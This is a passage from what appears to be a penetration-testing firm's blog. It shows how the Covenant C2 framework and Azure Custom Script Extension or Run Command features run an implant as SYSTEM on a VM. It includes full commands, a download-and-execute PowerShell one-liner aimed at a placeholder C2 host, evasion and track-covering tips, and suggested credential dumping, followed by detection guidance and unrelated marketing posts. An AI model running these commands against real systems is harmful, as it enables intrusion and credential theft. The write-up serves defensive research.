Once logged in, create an HTTP Listener. The listener will monitor a specified port awaiting traffic from the Grunt that we’ll run on our VM. The listener lets us send commands to, and receive results from, the Grunt implant.

Covenant Http Listener

Note that “BindAddress” is 0.0.0.0 which allows Covenant to bind port 80 for all available IPv4 address on the local machine (where Covenant is running). The “ConnectAddress” is a DNS name for our C2 server. This value is used to generate the URL which the Grunt will communicate with.

Once a listener is created, we need to create and host our Launcher. The Launcher is a PowerShell script which we’ll run in the target VM to start the Grunt. For this demo, we’ll use Covenant’s out-of-the-box PowerShell launcher. It’s important to note that this exact script is likely to be caught by anti-virus once the VM attempts to run it, but I’ve simply disabled anti-virus for the proof-of-concept. Typically, the Launcher script would need to be altered and obfuscated to avoid detection.

Once we’ve selected the PowerShell option from the Launcher Menu, we’ll first generate our script. The default options are fine for our test.

Covenant Launchers

After clicking the Generate button, we’ll navigate to the Host tab and provide a path where the script will be hosted and available from our C2 server. After we click the Host button, our script is now available for download from our server, and the UI provides a convenient PowerShell script to download and execute the Launcher.

Covenant Launchers

Our Covenant C2 server is now ready. The PowerShell Launcher script is available for download at https://c2.netspi.invalid/netspi/launcher.ps1. The Launcher will run the Grunt, which will connect back to the Covenant server to receive commands and send results.

We could actually host the PowerShell Launcher script anywhere. For example, we could host the script in GitHub or in Azure blob storage. If someone were to review the executed commands later, a script downloaded from these locations would be less suspicious. For this proof-of-concept, I prefer to use Covenant’s ability to easily host the launcher itself.

2: Use a Custom Script Extension to Launch the Implant

Thus far, all the work has been preparation. We’ve learned about the features available to us. We’ve set up our tools. Here comes the attack.

We’ll use the Azure Cloud Shell, but the same steps could be performed through Azure’s Portal web interface as well. We’ll start by listing the VMs available to us using the Get-AzVM cmdlet.

PS Azure:\> Get-AzVM | Format-Table -Wrap -AutoSize -Property ResourceGroupName,Name,Location
ResourceGroupName   Name      Location
-----------------   ----      --------
TESTER              CSETest   westcentralus

We’re able identify a VM named “CSETest” running in the environment. We can now use the Set-AzVMCustomScriptExtension cmdlet to add a Custom Script Extension to that VM. Before issuing the shell command, let’s review the parameters we’ll pass to the cmdlet:

  1. -ResourceGroupName TESTER
    1. The ResourceGroupName as identified in the previous command results.
  2. -VMName CSETest
    1. The VM Name as identified in the previous command results.
  3. -Location westcentralus
    1. The location of the VM as identified in the previous command results.
  4. -FileUri 'https://c2.netspi.invalid/netspi/launcher.ps1'
    1. The URL where our Powershell Launcher is hosted by out Covenant server.
  5. -Run 'launcher.ps1'
    1. The command used to execute the Launcher. In general, this is where script parameters could be passed.
  6. -Name CovenantScriptExtension
    1. An arbitrary name for our Custom Script Extension.

The moment we’ve all been waiting for, let’s run our Custom Script Extension:

PS Azure:\> Set-AzVMCustomScriptExtension -ResourceGroupName TESTER -VMName CSETest -Location westcentralus -FileUri 'https://c2.netspi.invalid/netspi/launcher.ps1' -Run 'launcher.ps1' -Name CovenantScriptExtension

Wait… it looks like nothing is happening in the Cloud Shell. This is because the PowerShell launcher is still running and has not yet terminated. If we return to our Covenant UI, we’ll receive a notification that a new Grunt has connected successfully. We’ll also be returned some basic information about the system on which it is running. In the screenshot below, note that that the Hostname and OperatingSystem are correct for our targeted VM.

Covenant Grunts

With only a couple of commands, our implant is successfully running on the targeted VM. If we click on the Grunt’s name, we can interact with it and issues further commands. In the screenshot below, we confirm that the Grunt is running as the LocalSystem account.

Covenant Grunts

That’s it. We have a SYSTEM process running on the target VM under our control. We have many options from here including establishing persistence and escalating our privileges further. For example we could:

  • Dump hashes/credentials with Invoke-Mimikatz.
  • Install a service to launch ensure a Grunt is started if the VM is restarted.
  • Search for sensitive files saved on the VM.
  • Enumerate domain information to target other VMs.

For now, we’ll stop this Grunt by issuing it the “Kill” command from the Covenant UI.

If we return to our Cloud Shell, we’ll see that we finally have some output:

PS Azure:\> Set-AzVMCustomScriptExtension -ResourceGroupName TESTER -VMName CSETest -Location westcentralus -FileUri 'https://c2.netspi.invalid/netspi/launcher.ps1' -Run 'launcher.ps1' -Name CovenantScriptExtension
RequestId IsSuccessStatusCode StatusCode ReasonPhrase
--------- ------------------- ---------- ------------
                         True         OK OK

After we killed the Grunt, the Custom Script Extension completed successfully. This indicates that the Custom Script Extension’s execution is tied to the Grunt. Due to Custom Script Extension’s 90 minute time limit, an attacker would need to accomplish their tasks within that timeframe. Alternatively, one could also establish persistence and open another Grunt, then allow the Custom Script Extension to finish successfully by killing the original Grunt.

3. Custom Script Extension Cleanup

Before moving on, let’s take a moment to cover our tracks and remove the Custom Script Extension. This can be accomplished with the Remove-AzVMCustomScriptExtension cmdlet. Its parameters are very similar to ones used for Set-AzVMCustomScriptExtension. When we run it in the Cloud Shell, we’ll see the following:

PS Azure:\> Remove-AzVMCustomScriptExtension -ResourceGroupName TESTER -VMName MGITest -Name CovenantScriptExtension

Virtual machine extension removal operation
This cmdlet will remove the specified virtual machine extension. Do you want to continue?
[Y] Yes  [N] No  [S] Suspend  [?] Help (default is "Y"): Y

RequestId IsSuccess StatusCode StatusCode ReasonPhrase
--------- ------------------- ---------- ------------
                         True         OK OK

Helpfully, this also removes the files which were written to C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension. These files are discussed in further detail at the end of this post.

4. Use the Run Command Feature to Launch Another Implant

In some cases, we may be unable to execute the Custom Script Extension. Perhaps our account doesn’t have appropriate privileges to do so. Maybe a Custom Script Extension has already been deployed so we can’t add another. Our alternative is to use the Run Command feature to run the same PowerShell Launcher and connect another Grunt. We’ll even get to keep the LocalSystem privileges.

Since we have already identified the target VM, and Covenant has already provided a one-line command to download and run the Launcher, we’ll only need to issue a pass that command through Cloud Shell to the VM through the Run Command feature. We’ll use az vm run-command for this. Like we did before, let’s make sure we understand the command itself:

  1. az vm run-command invoke
    1. This set of keywords create a single logical command to “Execute a specific run command on a VM.”
  2. --command-id RunPowerShellScript
    1. The command we intend to execute. We could choose from pre-built commands, but we would like to execute an arbitrary PowerShell script.
  3. --name CSETest
    1. The name of the VM.
  4. -g TESTER
    1. The name of the Resource Group.
  5. --scripts "iex (New-Object Net.WebClient).DownloadString('https://c2.netspi.invalid/netspi/launcher.ps1')"
    1. Typically, the “scripts” parameter is used to specific the name of a PowerShell script to execute. We are using it to specify the one-line command which downloads and runs the Launcher. As mentioned before, this one-line command is provided by Covenant in its UI.
  6. -Name CovenantScriptExtension
    1. An arbitrary name for our Custom Script Extension.

Now that we know what we’re doing, let’s run our command:

PS Azure:\> az vm run-command invoke --command-id RunPowerShellScript --name CSETest -g TESTER --scripts "iex (New-Object Net.WebClient).DownloadString('https://c2.netspi.invalid/netspi/launcher.ps1')"
- Running ..

At least this time we get some immediate feedback from Cloud Shell that something is happening. And after about 30 seconds, a new Grunt appears in our Covenant UI:

Covenant Grunts

Again, we can interact with the Grunt and confirm that the Grunt running as the LocalSystem account.

Covenant Grunts

As with the Custom Script Extension, we now have about 90 minutes before the command times out. Since we’re running as LocalSystem, we should have ample opportunity to establish persistence (if needed) and escalate privileges.
If we send the “Kill” to the new Grunt and return to our Cloud Shell, we’ll see that the command output is updated reporting a successful execution.

{
  "value": [
    {
      "code": "ComponentStatus/StdOut/succeeded",
      "displayStatus": "Provisioning succeeded",
      "level": "Info",
      "message": "",
      "time": null
    },
    {
      "code": "ComponentStatus/StdErr/succeeded",
      "displayStatus": "Provisioning succeeded",
      "level": "Info",
      "message": "",
      "time": null
    }
  ]
}

Unlike the Custom Script Extension (which must be uninstalled before being deployed again), we could re-issue the same command in Cloud Shell to launch a new Grunt. If we have multiple target VMs, we could use Invoke-AzureRmVMRunCommand to execute the Launcher across many targets at once.

Monitoring this attack

For blue teamers, hopefully this post illustrates how granting Owner, Contributor, Virtual Machine Contributor or Log Analytics Contributor roles allows that user to have SYSTEM rights on all accessible VMs. With that access, they can embed themselves into the network, maintaining persistence and continuing to escalate.

The silver lining here is that actions can be restricted by creating new roles and limiting permissions appropriately. The related actions that one may want to restrict are:

  • Microsoft.ClassicCompute/virtualMachines/extensions/write
  • Microsoft.Compute/virtualMachines/extensions/write
  • Microsoft.Compute/virtualMachines/runCommand/action

Additionally, the actions appear in the Activity Log for the targeted VM. If these actions aren’t regularly used in the organization, it’s straightforward to create Alerts for “Run Command on Virtual Machine” and “Create or Update Virtual Machine Extension.”

Vm Activity Log

Lastly, there are file system changes on the target VM for each of the approaches. If trying to remain undetected, an attacker may remove these files, but not much can be done to prevent their creation.

Custom Script Extension Files

The script itself is downloaded to C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension<version>Downloads<other version><script name> when the Custom Script Extension is installed. For example, the PowerShell launcher in our proof-of-concept was downloaded to C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension1.10.3Downloadslauncher.ps1.

If the Custom Extension is later uninstalled, the whole C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension folder is removed.

The output from the Custom Script Extension (including logging from the script itself) is written to C:WindowsAzureLogsPluginsMicrosoft.Compute.CustomScriptExtension<version> folder. For example, our logs were written to the C:WindowsAzureLogsPluginsMicrosoft.Compute.CustomScriptExtension1.10.3 folder. These are not automatically deleted when the Custom Script Extension is uninstalled.

Run Command Files

The Run Command approach has similar file system artifacts. The supplied script is written to C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows<version>Downloadsscript<number>.ps1. Any logging output from the script is written to the C:WindowsAzureLogsPluginsMicrosoft.CPlat.Core.RunCommandWindows<version> folder.

Acknowledgements

Thank you to Karl Fosaaen for the previous research and suggestion of how Custom Script Extensions could be utilized to launch implants. And thank you to cobbr at SpecterOps for publishing and maintaining Covenant, which was a pleasure to work with.

Back

What Is.com Word of the Day: Pentesting as a Service (PTaas)

On Feb. 4, 2020, NetSPI Product Manager Jake Reynolds was featured in TechTarget’s WhatIs.com defining Pentesting as a Service.

Pentesting as a Service (PTaaS) is a cloud service that provides information technology (IT) professionals with the resources they need to conduct and act upon point-in-time and continuous penetration tests. The goal of PTaaS is to help organizations build successful vulnerability management programs that can find, prioritize and remediate security threats quickly and efficiently.

In IT security, it is common practice for businesses to hire reputable, white hat testers to come in and proactively look for attack vectors that could be exploited. Inviting an outside entity to try and breach a network, server or application may sound counter-intuitive, but it’s also one of the best ways to identify and remediate difficult-to-spot security issues.

Read the full article here.

Back

NetSPI Heads to RSAC 2020 to Showcase and Demo Penetration Testing as a Service (PTaaS) Powered by Resolve™

NetSPI Heads to RSAC 2020 to Showcase and Demo Penetration Testing as a Service (PTaaS) Powered by Resolve™

Minneapolis, Minnesota  –  NetSPI, a leader in vulnerability testing and management, is exhibiting at RSAC 2020 at the Moscone Center in San Francisco. On February 24-28, the halls will be filled cybersecurity industry conversations, including expert-led sessions and keynotes, innovation programs, in-depth tutorials and trainings, expanded networking opportunities, product demos, and more. This year, the conference theme is “Human Element,” exploring our critical role in ensuring a safer, more secure future. During the conference, the NetSPI leadership team will be showcasing its new Penetration Testing as a Service (PTaaS) delivery service model powered by Resolve™.

Who:

Deke George, Founder and CEO at NetSPI
Aaron Shilts, President and COO at NetSPI
Charles Horton, SVP Client Services at NetSPI
Jake Reynolds, Product Manager at NetSPI

What:

RSAC Exhibitor Booth – Meet the NetSPI team at booth #4201 to learn more about their expertise in penetration testing and vulnerability management. Get a first look and demo of PTaaS Powered by Resolve™.

“Scaling Your Security Program with Penetration Testing as a Service” – Whether managing an annual penetration test, or delivering and prioritizing millions of vulnerabilities, traditional service delivery methods fall short. Visit booth S-1500 in the RSAC Briefing Center on Thursday, February 28 at 4:40pm PST to hear NetSPI Product Manager Jake Reynolds speak about how Penetration Testing as a Service scales and operationalizes continuous penetration testing in an ongoing, consumable fashion.

View the full conference agenda here.

When:

February 24-29, 2020

Where:

Booth #4201
Moscone Center
San Francisco, California

About NetSPI

NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with seven of the top ten U.S. banks, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve™ platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track and fix their vulnerabilities faster. Follow us on FacebookTwitter, and LinkedIn.

Media Contact
Tori Norris
Maccabee on behalf of NetSPI
Email: tori@maccabee.com
Phone: (612) 294-3100

Back

Keep Pace with Evolving Attack Surfaces: Penetration Testing as a Service

Study after study shows that business leaders across the country place cybersecurity in their top concerns for 2020. PwC’s 23rd annual CEO Survey shows that 53% of U.S. CEOs are “extremely concerned” about the effect cyber threats will have on growth prospects.

And the findings of the Conference Board are similar. According to the survey, cybersecurity was the top concern for CEOs in 2019. What’s more, according to the study, cybersecurity budgets are increasing, with more than 70% of responding CEOs globally planning to increase their cybersecurity budgets this year. Interestingly, cybersecurity strategy remains elusive: almost 40% of responding CEOs globally say their organizations lack a clear strategy to deal with the financial and reputational impact of a cyberattack or data breach.

Often, we see that an inadequate security test can leave a company with a false sense of security. Couple that with the fact that in 2019 the average cost of a data breach to a company was $3.9 million, and a greater business challenge emerges. The bottom line is that organizations are always-on, so their security should be too. It’s more critical than ever that organizations implement a more proactive strategy to better understand their security weaknesses and vulnerabilities.

Penetration testing, delivered in a consumable fashion, and executed monthly or quarterly, rather than annually, can help. At NetSPI we call it Penetration Testing as a Service or PTaaS. Here’s all you need to know before investing in PTaaS, to achieve a successful vulnerability testing and management program.

An Introduction to PTaaS

PTaaS is the delivery model of combined manual and automated pentesting producing real-time, actionable results, allowing security teams to remediate vulnerabilities faster, better understand their security posture, and perform more comprehensive testing throughout the year.

A successful PTaaS program delivers security testing comprised of an expert manual pentesting team enhanced by automation. It puts customers in control of their pentests and their data, enabling them to simplify the scoping of new engagements, view their testing results in real time, orchestrate quicker remediation, and have the ability to perform always-on continuous testing.

The Case for PTaaS

According to PwC, cyber threats are a drag on growth, and tolerances for breaches and trust in technology are plummeting. To combat these trends, organizations need to shore up resilience. “Step one is to use technology to get real-time views into your most critical processes and assets, and then set up for continuous resilience,” it states.

Organizations with a mature security program understand that point-in-time testing is not the best option for continuously securing their applications and networks. New code and configurations are released every day; a continuous security program delivers results to customers around the clock, enabling them to manage their vulnerabilities easier and more efficiently.

PTaaS should be viewed as an essential IT department activity for identifying exploitable security vulnerabilities present across all networks in computing devices, such as desktop operating systems, web applications, mobile apps, and more. It proactively hardens an environment by identifying security weaknesses and software vulnerabilities, and then prioritizing them by severity of outcome should they be exploited, as factored against the likeliness of the attack. [Want to read more about penetration testing, a commonly misunderstood security discipline? Grab a cup of coffee and enjoy.

Choosing the Best PTaaS Partner for Your Business

When evaluating PTaaS options, security professionals would be well advised to:

  • Insist on real-time accessible reporting and not settle for reams and reams of static PDF reports that don’t allow for access to data in real-time as vulnerabilities are found.
  • Look for a platform, dashboard or technology efficiencies, that offer increased speed to remediation and direct communication with the pentesting experts. For example, NetSPI’s platform houses all vulnerability data and provides remediation guidance for real-time access and assessment.
  • Prioritize non-negotiables like employing a team of expert deep-dive manual pentesting professionals with enhanced automation, as automated pentesting and scanners will only ever find a portion of an organization’s vulnerabilities. While automation creates efficiencies, the human touch is also necessary to identify potentially high and critical severity threats that can only be discovered by manual testing.

As attack surfaces constantly grow and evolve, it’s important to recognize that point-in-time penetration testing, while important, is no longer an effective means of year-round security and that there are options available that can increase the value that you get from traditional testing. As an industry, our ultimate goal is to prevent breaches from happening – but, how can we make that happen without having an “always-on” mentality?

Learn more about NetSPI PTaaS here.

Discover how the NetSPI BAS solution helps organizations validate the efficacy of existing security controls and understand their Security Posture and Readiness.

X